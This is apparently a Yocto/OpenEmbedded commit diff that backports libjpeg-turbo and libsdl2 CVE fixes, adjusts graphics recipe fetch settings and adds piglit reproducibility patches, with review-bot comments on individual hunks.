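+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/0deab87e24ab3106d5332205f829d1846fa65001]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ ChangeLog.md | 8 ++++++++
+ jdapistd.c | 10 ++++++----
+ 2 files changed, 14 insertions(+), 4 deletions(-)
+
+diff --git a/ChangeLog.md b/ChangeLog.md
+index de0c4d0dd..159bd1610 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -4,6 +4,14 @@ overruns when attempting to decompress various specially-crafted malformed
+ (`-DWITH_12BIT=1`) with both color quantization and RGB565 color conversion
+ enabled.
+
++10. Fixed an issue whereby `jpeg_crop_scanline()` sometimes miscalculated the
++downsampled width for components with 4x2 or 2x4 subsampling factors if
++decompression scaling was enabled. This caused the components to be upsampled
++incompletely, which caused the color converter to read from uninitialized
++memory. With 12-bit data precision, this caused a buffer overrun or underrun
++and subsequent segfault if the sample value read from unitialized memory was
++outside of the valid sample range.
++
+ 2.0.4
+ =====
+
+diff --git a/jdapistd.c b/jdapistd.c
+index 628626254..eb577928c 100644
+--- a/jdapistd.c
++++ b/jdapistd.c
+@@ -4,7 +4,7 @@
+ * This file was part of the Independent JPEG Group's software:
+ * Copyright (C) 1994-1996, Thomas G. Lane.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2010, 2015-2018, 2020, D. R. Commander.
++ * Copyright (C) 2010, 2015-2018, 2020, 2023, D. R. Commander.
+ * Copyright (C) 2015, Google, Inc.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+@@ -225,9 +225,11 @@ jpeg_crop_scanline(j_decompress_ptr cinfo, JDIMENSION *xoffset,
+ /* Set downsampled_width to the new output width. */
+ orig_downsampled_width = compptr->downsampled_width;
+ compptr->downsampled_width =
+- (JDIMENSION)jdiv_round_up((long)(cinfo->output_width *
+- compptr->h_samp_factor),
+- (long)cinfo->max_h_samp_factor);
++ (JDIMENSION)jdiv_round_up((long)cinfo->output_width *
++ (long)(compptr->h_samp_factor *
++ compptr->_DCT_scaled_size),
++ (long)(cinfo->max_h_samp_factor *
++ cinfo->_min_DCT_scaled_size));
+ if (compptr->downsampled_width < 2 && orig_downsampled_width >= 2)
+ reinit_upsampler = TRUE;
+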
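diff --git a/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb b/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb
index 3005a8a789..fda425c219 100644
--- a/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb
+++ b/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb
@@ -13,6 +13,11 @@ DEPENDS_append_x86_class-target = " nasm-native"
 SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BPN}-${PV}.tar.gz \
  file://0001-libjpeg-turbo-fix-package_qa-error.patch \
  file://CVE-2020-13790.patch \
+ file://CVE-2021-46822.patch \
+ file://CVE-2020-35538-1.patch \
+ file://CVE-2020-35538-2.patch \
+ file://CVE-2023-2804-1.patch \
+ file://CVE-2023-2804-2.patch \
  "
 
 SRC_URI[md5sum] = "d01d9e0c28c27bc0de9f4e2e8ff49855"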
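diff --git a/meta/recipes-graphics/kmscube/kmscube_git.bb b/meta/recipes-graphics/kmscube/kmscube_git.bb
index a1a295f660..0aae6df357 100644
--- a/meta/recipes-graphics/kmscube/kmscube_git.bb
+++ b/meta/recipes-graphics/kmscube/kmscube_git.bb
@@ -1,4 +1,8 @@
-DESCRIPTION = "Demo application to showcase 3D graphics using kms and gbm"
+SUMMARY = "Demo application to showcase 3D graphics using kms and gbm"
+DESCRIPTION = "kmscube is a little demonstration program for how to drive bare metal graphics \
+without a compositor like X11, wayland or similar, using DRM/KMS (kernel mode \
+setting), GBM (graphics buffer manager) and EGL for rendering content using \
+OpenGL or OpenGL ES."
 HOMEPAGE = "https://cgit.freedesktop.org/mesa/kmscube/"
 LICENSE = "MIT"
 SECTION = "graphics"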
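diff --git a/meta/recipes-graphics/libfakekey/libfakekey_git.bb b/meta/recipes-graphics/libfakekey/libfakekey_git.bb
index ab6f5ac9ed..33ea6fe5a9 100644
--- a/meta/recipes-graphics/libfakekey/libfakekey_git.bb
+++ b/meta/recipes-graphics/libfakekey/libfakekey_git.bb
@@ -13,7 +13,7 @@ SECTION = "x11/wm"
 SRCREV = "7ad885912efb2131e80914e964d5e635b0d07b40"
 PV = "0.3+git${SRCPV}"
 
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
 
 S = "${WORKDIR}/git"
 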
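Review bot: The updated `SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"` still fetches over the unauthenticated git protocol, while the github.com URIs touched by this same commit (libva-utils, mx) gain `protocol=https`. The pinned `SRCREV` limits what a tampered transfer could substitute, but the transport itself offers no server authentication. Writing `SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master;protocol=https"` would bring it in line, once HTTPS cloning from that host is confirmed. The same applies to the libmatchbox_1.12.bb and matchbox-wm_1.2.2.bb changes in this commit.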
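diff --git a/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb b/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb
index 1a31677978..06bd682823 100644
--- a/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb
+++ b/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb
@@ -17,7 +17,7 @@ DEPENDS = "virtual/libx11 libxext"
 
 #SRCREV for 1.12
 SRCREV = "e846ee434f8e23d9db38af13c523f791495e0e87"
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
 
 S = "${WORKDIR}/git"
 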
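diff --git a/meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch
new file mode 100644
index 0000000000..d8fa24bc65
--- /dev/null
+++ b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch
@@ -0,0 +1,79 @@
+From a7ff6e96155f550a5597621ebeddd03c98aa9294 Mon Sep 17 00:00:00 2001
+From: Sam Lantinga <slouken@libsdl.org>
+Date: Wed, 17 Jun 2020 08:44:45 -0700
+Subject: [PATCH] Fixed overflow in surface pitch calculation
+
+
+Upstream-Status: Backport
+[https://github.com/libsdl-org/SDL/commit/a7ff6e96155f550a5597621ebeddd03c98aa9294]
+CVE: CVE-2020-14409 CVE-2020-14410
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ src/video/SDL_surface.c | 23 +++++++++++++++--------
+ 1 file changed, 15 insertions(+), 8 deletions(-)
+
+diff --git a/src/video/SDL_surface.c b/src/video/SDL_surface.c
+index 085d9ff1e..bff826f7c 100644
+--- a/src/video/SDL_surface.c
++++ b/src/video/SDL_surface.c
+@@ -28,24 +28,23 @@
+ #include "SDL_yuv_c.h"
+
+
+-/* Check to make sure we can safely check multiplication of surface w and pitch and it won't overflow size_t */
+-SDL_COMPILE_TIME_ASSERT(surface_size_assumptions,
+- sizeof(int) == sizeof(Sint32) && sizeof(size_t) >= sizeof(Sint32));
++/* Check to make sure we can safely check multiplication of surface w and pitch and it won't overflow Sint64 */
++SDL_COMPILE_TIME_ASSERT(surface_size_assumptions, sizeof(int) == sizeof(Sint32));
+
+ /* Public routines */
+
+ /*
+ * Calculate the pad-aligned scanline width of a surface
+ */
+-static int
++static Sint64
+ SDL_CalculatePitch(Uint32 format, int width)
+ {
+- int pitch;
++ Sint64 pitch;
+
+ if (SDL_ISPIXELFORMAT_FOURCC(format) || SDL_BITSPERPIXEL(format) >= 8) {
+- pitch = (width * SDL_BYTESPERPIXEL(format));
++ pitch = ((Sint64)width * SDL_BYTESPERPIXEL(format));
+ } else {
+- pitch = ((width * SDL_BITSPERPIXEL(format)) + 7) / 8;
++ pitch = (((Sint64)width * SDL_BITSPERPIXEL(format)) + 7) / 8;
+ }
+ pitch = (pitch + 3) & ~3; /* 4-byte aligning for speed */
+ return pitch;
+@@ -59,11 +58,19 @@ SDL_Surface *
+ SDL_CreateRGBSurfaceWithFormat(Uint32 flags, int width, int height, int depth,
+ Uint32 format)
+ {
++ Sint64 pitch;
+ SDL_Surface *surface;
+
+ /* The flags are no longer used, make the compiler happy */
+ (void)flags;
+
++ pitch = SDL_CalculatePitch(format, width);
++ if (pitch < 0 || pitch > SDL_MAX_SINT32) {
++ /* Overflow... */
++ SDL_OutOfMemory();
++ return NULL;
++ }
++
+ /* Allocate the surface */
+ surface = (SDL_Surface *) SDL_calloc(1, sizeof(*surface));
+ if (surface == NULL) {
+@@ -78,7 +85,7 @@ SDL_CreateRGBSurfaceWithFormat(Uint32 flags, int width, int height, int depth,
+ }
+ surface->w = width;
+ surface->h = height;
+- surface->pitch = SDL_CalculatePitch(format, width);
++ surface->pitch = (int)pitch;
+ SDL_SetClipRect(surface, NULL);
+
+ if (SDL_ISPIXELFORMAT_INDEXED(surface->format->format)) {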
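Review bot: In `SDL_CreateRGBSurfaceWithFormat()` the new guard `if (pitch < 0 || pitch > SDL_MAX_SINT32)` reports every rejected width through `SDL_OutOfMemory()`, including a negative `width` that yields a negative pitch, although nothing has been allocated at that point. Anyone triaging an out-of-memory error from surface creation after this patch should read it as possibly meaning rejected dimensions from untrusted image data rather than memory pressure. A comment on the branch would record that, e.g. `/* Negative or overflowing pitch: dimensions rejected, nothing allocated yet */`. The function body continues outside the hunk.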
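diff --git a/meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch
new file mode 100644
index 0000000000..a4ed7ab8e6
--- /dev/null
+++ b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch
@@ -0,0 +1,38 @@
+From 8c91cf7dba5193f5ce12d06db1336515851c9ee9 Mon Sep 17 00:00:00 2001
+From: Sam Lantinga <slouken@libsdl.org>
+Date: Tue, 30 Nov 2021 12:36:46 -0800
+Subject: [PATCH] Always create a full 256-entry map in case color values are
+ out of range
+
+Fixes https://github.com/libsdl-org/SDL/issues/5042
+
+CVE: CVE-2021-33657
+Upstream-Status: Backport [https://github.com/libsdl-org/SDL/commit/8c91cf7dba5193f5ce12d06db1336515851c9ee9.patch]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/video/SDL_pixels.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/src/video/SDL_pixels.c b/src/video/SDL_pixels.c
+index ac04533c5d5..9bb02f771d0 100644
+--- a/src/video/SDL_pixels.c
++++ b/src/video/SDL_pixels.c
+@@ -947,7 +947,7 @@ Map1to1(SDL_Palette * src, SDL_Palette * dst, int *identical)
+ }
+ *identical = 0;
+ }
+- map = (Uint8 *) SDL_malloc(src->ncolors);
++ map = (Uint8 *) SDL_calloc(256, sizeof(Uint8));
+ if (map == NULL) {
+ SDL_OutOfMemory();
+ return (NULL);
+@@ -971,7 +971,7 @@ Map1toN(SDL_PixelFormat * src, Uint8 Rmod, Uint8 Gmod, Uint8 Bmod, Uint8 Amod,
+ SDL_Palette *pal = src->palette;
+
+ bpp = ((dst->BytesPerPixel == 3) ? 4 : dst->BytesPerPixel);
+- map = (Uint8 *) SDL_malloc(pal->ncolors * bpp);
++ map = (Uint8 *) SDL_calloc(256, bpp);
+ if (map == NULL) {
+ SDL_OutOfMemory();
+ return (NULL);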
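Review bot: Both replacement allocations, `SDL_calloc(256, sizeof(Uint8))` in `Map1to1()` and `SDL_calloc(256, bpp)` in `Map1toN()`, hard-code 256 without saying that it is the number of values an 8-bit pixel index can take. The loops that fill the maps are outside the hunks; they presumably still run to `ncolors`, so the fixed size also assumes a palette never holds more than 256 entries, which the previous `ncolors`-sized allocation did not need to assume. A comment at each call would record both facts, for example `/* 256 entries: one per possible Uint8 index; assumes ncolors <= 256 */`. Both functions start and end outside their hunks.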
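diff --git a/meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch
new file mode 100644
index 0000000000..b02a2169a6
--- /dev/null
+++ b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch
@@ -0,0 +1,38 @@
+From 00b67f55727bc0944c3266e2b875440da132ce4b Mon Sep 17 00:00:00 2001
+From: zhailiangliang <zhailiangliang@loongson.cn>
+Date: Wed, 21 Sep 2022 10:30:38 +0800
+Subject: [PATCH] Fix potential memory leak in GLES_CreateTexture
+
+
+CVE: CVE-2022-4743
+Upstream-Status: Backport [https://github.com/libsdl-org/SDL/commit/00b67f55727bc0944c3266e2b875440da132ce4b.patch]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/render/opengles/SDL_render_gles.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/src/render/opengles/SDL_render_gles.c b/src/render/opengles/SDL_render_gles.c
+index a5fbab309eda..ba08a46e2805 100644
+--- a/src/render/opengles/SDL_render_gles.c
++++ b/src/render/opengles/SDL_render_gles.c
+@@ -359,6 +359,9 @@ GLES_CreateTexture(SDL_Renderer * renderer, SDL_Texture * texture)
+ renderdata->glGenTextures(1, &data->texture);
+ result = renderdata->glGetError();
+ if (result != GL_NO_ERROR) {
++ if (texture->access == SDL_TEXTUREACCESS_STREAMING) {
++ SDL_free(data->pixels);
++ }
+ SDL_free(data);
+ return GLES_SetError("glGenTextures()", result);
+ }
+@@ -387,6 +390,9 @@ GLES_CreateTexture(SDL_Renderer * renderer, SDL_Texture * texture)
+
+ result = renderdata->glGetError();
+ if (result != GL_NO_ERROR) {
++ if (texture->access == SDL_TEXTUREACCESS_STREAMING) {
++ SDL_free(data->pixels);
++ }
+ SDL_free(data);
+ return GLES_SetError("glTexImage2D()", result);
+ }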
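diff --git a/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb b/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb
index fa7acc4c50..fa29bc99ac 100644
--- a/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb
+++ b/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb
@@ -20,6 +20,9 @@ SRC_URI = "http://www.libsdl.org/release/SDL2-${PV}.tar.gz \
  file://more-gen-depends.patch \
  file://directfb-spurious-curly-brace-missing-e.patch \
  file://directfb-renderfillrect-fix.patch \
+ file://CVE-2020-14409-14410.patch \
+ file://CVE-2021-33657.patch \
+ file://CVE-2022-4743.patch \
 "
 
 S = "${WORKDIR}/SDL2-${PV}"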
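diff --git a/meta/recipes-graphics/libva/libva-utils_2.6.0.bb b/meta/recipes-graphics/libva/libva-utils_2.6.0.bb
index 03b38027a1..f14ed0f52b 100644
--- a/meta/recipes-graphics/libva/libva-utils_2.6.0.bb
+++ b/meta/recipes-graphics/libva/libva-utils_2.6.0.bb
@@ -14,7 +14,7 @@ SECTION = "x11"
 LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://COPYING;md5=b148fc8adf19dc9aec17cf9cd29a9a5e"
 
-SRC_URI = "git://github.com/intel/libva-utils.git;branch=v2.6-branch"
+SRC_URI = "git://github.com/intel/libva-utils.git;branch=v2.6-branch;protocol=https"
 SRCREV = "8ea1eba433dcbceb0e5dcb54b8e3f984987f7a17"
 S = "${WORKDIR}/git"
 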
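diff --git a/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb b/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb
index a08eb252ce..3ea67d09d6 100644
--- a/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb
+++ b/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb
@@ -12,7 +12,7 @@ DEPENDS = "libmatchbox virtual/libx11 libxext libxrender startup-notification ex
 
 # SRCREV tagged 1.2.2
 SRCREV = "27da947e7fbdf9659f7e5bd1e92af92af6c03970"
-SRC_URI = "git://git.yoctoproject.org/matchbox-window-manager \
+SRC_URI = "git://git.yoctoproject.org/matchbox-window-manager;branch=master \
  file://0001-Fix-build-with-gcc-10.patch \
  file://kbdconfig"
 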
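diff --git a/meta/recipes-graphics/mesa/mesa.inc b/meta/recipes-graphics/mesa/mesa.inc
index a1bf878b1a..bfab19e773 100644
--- a/meta/recipes-graphics/mesa/mesa.inc
+++ b/meta/recipes-graphics/mesa/mesa.inc
@@ -231,7 +231,7 @@ python mesa_populate_packages() {
  import re
  dri_drivers_root = oe.path.join(d.getVar('PKGD'), d.getVar('libdir'), "dri")
  if os.path.isdir(dri_drivers_root):
- dri_pkgs = os.listdir(dri_drivers_root)
+ dri_pkgs = sorted(os.listdir(dri_drivers_root))
  lib_name = d.expand("${MLPREFIX}mesa-megadriver")
  for p in dri_pkgs:
  m = re.match(r'^(.*)_dri\.so$', p)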
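diff --git a/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb b/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb
index 4e89d631c3..549b0cbdf7 100644
--- a/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb
+++ b/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Very simple session manager for X"
+DESCRIPTION = "Simple session manager for X, that provides just the right boilerplate to create a session and launch the browser "
 HOMEPAGE = "http://www.yoctoproject.org"
 BUGTRACKER = "http://bugzilla.pokylinux.org"
 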
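diff --git a/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb b/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb
index 58a6997ffe..88101b5dcc 100644
--- a/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb
+++ b/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb
@@ -7,7 +7,7 @@ PV = "1.4.7+git${SRCPV}"
 # Exclude x.99.x versions from upstream checks
 UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>^\d+(\.(?!99)\d+)+)"
 
-SRC_URI = "git://github.com/clutter-project/mx.git;branch=mx-1.4 \
+SRC_URI = "git://github.com/clutter-project/mx.git;branch=mx-1.4;protocol=https \
  file://fix-test-includes.patch \
  "
 S = "${WORKDIR}/git"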
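diff --git a/meta/recipes-graphics/mx/mx.inc b/meta/recipes-graphics/mx/mx.inc
index 714a06f0af..c977849c96 100644
--- a/meta/recipes-graphics/mx/mx.inc
+++ b/meta/recipes-graphics/mx/mx.inc
@@ -1,4 +1,10 @@
 SUMMARY = "Clutter based UI widget library"
+DESCRIPTION = "Mx is a widget toolkit using Clutter that provides a set of standard interface \
+elements, including buttons, progress bars, scroll bars and others. It also \
+implements some standard managers. One other interesting feature is the \
+possibility setting style properties from a CSS format file."
+HOMEPAGE = "https://github.com/clutter-project/mx"
+BUGTRACKER = "https://github.com/clutter-project/mx/issues"
 LICENSE = "LGPLv2.1"
 
 inherit clutter autotools features_check gobject-introspection gtk-doc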
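diff --git a/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch b/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch
new file mode 100644
index 0000000000..caa48e088d
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch
@@ -0,0 +1,27 @@
+From d623e9797b7ee9b3739a8a4afe1a01f7e03754aa Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Sun, 1 Nov 2020 20:08:49 +0000
+Subject: [PATCH] Add a missing include for htobe32 definition
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c b/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c
+index 5f45e0c23..c755ee29a 100644
+--- a/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c
++++ b/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c
+@@ -34,6 +34,8 @@
+
+ #include "piglit-util-gl.h"
+
++#include <endian.h>
++
+ #define IMAGE_WIDTH 60
+ #define IMAGE_HEIGHT 60
+
+--
+2.17.1
+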
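diff --git a/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch b/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch
new file mode 100644
index 0000000000..cc9482c047
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch
@@ -0,0 +1,31 @@
+From 9086d42df1f3134bafcfe33ff16db7bbb9d9a0fd Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Mon, 30 Nov 2020 23:08:22 +0000
+Subject: [PATCH] framework/profile.py: make test lists reproducible
+
+These are created with os.walk, which yields different
+order depending on where it's run.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ framework/profile.py | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/framework/profile.py b/framework/profile.py
+index c210e535e..9b5d51d68 100644
+--- a/framework/profile.py
++++ b/framework/profile.py
+@@ -528,7 +528,11 @@ class TestProfile(object):
+ else:
+ opts[n] = self.test_list[n]
+ else:
+- opts = self.test_list # pylint: disable=redefined-variable-type
++ opts = collections.OrderedDict()
++ test_keys = list(self.test_list.keys())
++ test_keys.sort()
++ for k in test_keys:
++ opts[k] = self.test_list[k]
+
+ for k, v in self.filters.run(opts.items()):
+ yield k, v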
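Review bot: The five added lines in the `else:` branch build the sorted mapping by hand (`list(...keys())`, `.sort()`, then a loop); one expression does the same with less to get wrong: `opts = collections.OrderedDict((k, self.test_list[k]) for k in sorted(self.test_list.keys()))`. The hunk does not show whether framework/profile.py already imports `collections`, so that needs checking before relying on the patch. The enclosing method starts outside the hunk.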
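--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch
@@ -0,0 +1,44 @@
+From 1b23539aece156f6fe0789cb988f22e5915228f6 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Tue, 10 Nov 2020 17:12:32 +0000
+Subject: [PATCH 1/2] generated_tests/gen_tcs/tes_input_tests.py: do not
+ hardcode the full binary path
+
+This helps reproducibility.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ generated_tests/gen_tcs_input_tests.py | 2 +-
+ generated_tests/gen_tes_input_tests.py | 2 +-
+ 2 files changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/generated_tests/gen_tcs_input_tests.py b/generated_tests/gen_tcs_input_tests.py
+index face4f19a..e36671af4 100644
+--- a/generated_tests/gen_tcs_input_tests.py
++++ b/generated_tests/gen_tcs_input_tests.py
+@@ -272,7 +272,7 @@ class Test(object):
+ relative probe rgb (0.75, 0.75) (0.0, 1.0, 0.0)
+ """)
+
+- test = test.format(self=self, generator_command=" ".join(sys.argv))
++ test = test.format(self=self, generator_command="generated_tests/gen_tcs_input_tests.py")
+
+ filename = self.filename()
+ dirname = os.path.dirname(filename)
+diff --git a/generated_tests/gen_tes_input_tests.py b/generated_tests/gen_tes_input_tests.py
+index 3d847b5cc..954840b20 100644
+--- a/generated_tests/gen_tes_input_tests.py
++++ b/generated_tests/gen_tes_input_tests.py
+@@ -301,7 +301,7 @@ class Test(object):
+ relative probe rgb (0.75, 0.75) (0.0, 1.0, 0.0)
+ """)
+
+- test = test.format(self=self, generator_command=" ".join(sys.argv))
++ test = test.format(self=self, generator_command="generated_tests/gen_tes_input_tests.py")
+
+ filename = self.filename()
+ dirname = os.path.dirname(filename)
+--
+2.17.1
+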
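Review bot: Both hunks replace `" ".join(sys.argv)` with a string literal that repeats the script's own path, so the header written into each generated test no longer records the arguments the generator ran with, and the literal goes stale if either file is renamed. A comment above the `test.format(...)` call, for example `# fixed string instead of sys.argv: the invocation path made the output non-reproducible`, would explain the choice in gen_tcs_input_tests.py and gen_tes_input_tests.py alike. If `sys` was imported only for this call the import is now unused; that is not visible in the hunks, and the enclosing methods continue outside them.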
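--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch
@@ -0,0 +1,30 @@
+From 1919bb7f4072d73dcbb64d0e06eff5b04529c3db Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Mon, 16 Nov 2020 18:01:02 +0000
+Subject: [PATCH] serializer.py: make .gz files reproducible
+
+.gz format contains mtime of the compressed data, and
+SOURCE_DATE_EPOCH is the standard way to make it reproducuble.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/serializer.py | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/tests/serializer.py b/tests/serializer.py
+index bd14bc3db..bc5b45d7f 100644
+--- a/tests/serializer.py
++++ b/tests/serializer.py
+@@ -138,7 +138,10 @@ def serializer(name, profile, outfile):
+ et.SubElement(env, 'env', name=k, value=v)
+
+ tree = et.ElementTree(root)
+- with gzip.open(outfile, 'wb') as f:
++ reproducible_mtime = None
++ if 'SOURCE_DATE_EPOCH' in os.environ:
++ reproducible_mtime=os.environ['SOURCE_DATE_EPOCH']
++ with gzip.GzipFile(outfile, 'wb', mtime=reproducible_mtime) as f:
+ tree.write(f, encoding='utf-8', xml_declaration=True)
+
+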
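Review bot: `reproducible_mtime` is assigned the raw environment string, so `gzip.GzipFile` receives a `str` for `mtime` where a number is expected. That works only as long as the gzip module converts the value itself, and a malformed `SOURCE_DATE_EPOCH` would then surface as an error inside the header write rather than where the variable is read. Convert at the point of reading: `reproducible_mtime = int(os.environ['SOURCE_DATE_EPOCH'])`. Whether `os` is already imported in tests/serializer.py is not visible in the hunk.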
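--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch
@@ -0,0 +1,28 @@
+From 5bf89c6a314952313b2b762fff0d5501fe57ac53 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Wed, 2 Dec 2020 21:21:52 +0000
+Subject: [PATCH] tests/shader.py: sort the file list before working on it
+
+This allows later xml output to be reproducible.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/shader.py | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/tests/shader.py b/tests/shader.py
+index 849273660..e6e65d1ba 100644
+--- a/tests/shader.py
++++ b/tests/shader.py
+@@ -52,7 +52,9 @@ for basedir in [TESTS_DIR, GENERATED_TESTS_DIR]:
+ for group, files in shader_tests.items():
+ assert group not in profile.test_list, 'duplicate group: {}'.format(group)
+
+- # We'll end up with a list of tuples, split that into two lists
++ # This makes the xml output reproducible, as os.walk() order is random
++ files.sort()
++ # We'll end up with a list of tuples, split that into two list
+ files, installedfiles = list(zip(*files))
+ files = list(files)
+ installedfiles = list(installedfiles)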
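Review bot: The rewritten comment above `zip(*files)` turns "two lists" into "two list", a typo that also makes the patch touch a line it has no reason to change; leaving the original comment alone shrinks the diff to the two added lines. The added comment calls `os.walk()` order random, but it depends on the filesystem rather than on chance, so `# sort so the xml output does not depend on os.walk() order` is more accurate. `files.sort()` orders the tuples in place by their first element, which appears to be the intent.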
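--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch
@@ -0,0 +1,30 @@
+From 1c67250308a92d4991ed05d9d240090ab84accae Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Tue, 10 Nov 2020 17:13:50 +0000
+Subject: [PATCH 2/2] tests/util/piglit-shader.c: do not hardcode build path
+ into target binary
+
+This helps reproducibilty.
+
+Upstream-Status: Inappropriate [oe-core specific]
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/util/piglit-shader.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/tests/util/piglit-shader.c b/tests/util/piglit-shader.c
+index 4fd68d21e..c9ea8295e 100644
+--- a/tests/util/piglit-shader.c
++++ b/tests/util/piglit-shader.c
+@@ -73,7 +73,7 @@ piglit_compile_shader(GLenum target, const char *filename)
+
+ source_dir = getenv("PIGLIT_SOURCE_DIR");
+ if (source_dir == NULL) {
+- source_dir = SOURCE_DIR;
++ source_dir = ".";
+ }
+
+ snprintf(filename_with_path, FILENAME_MAX - 1,
+--
+2.17.1
+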
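Review bot: With `source_dir = "."` the fallback resolves shader files relative to whatever directory the test binary is started from, so a run without `PIGLIT_SOURCE_DIR` loads whatever sits under the current working directory, or fails with a path error that never mentions the variable. A comment on the assignment, e.g. `/* no build path baked in: set PIGLIT_SOURCE_DIR unless running from the source root */`, would document the new requirement, and the test runner on the target should export the variable explicitly. `piglit_compile_shader` continues outside the hunk.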
diff --git a/meta/recipes-graphics/piglit/piglit_git.bb b/meta/recipes-graphics/piglit/piglit_git.bb
index 58d10d6b9b..9897ef1575 100644
--- a/meta/recipes-graphics/piglit/piglit_git.bb
+++ b/meta/recipes-graphics/piglit/piglit_git.bb
@@ -1,16 +1,24 @@
1SUMMARY = "OpenGL driver testing framework" 1SUMMARY = "OpenGL driver testing framework"
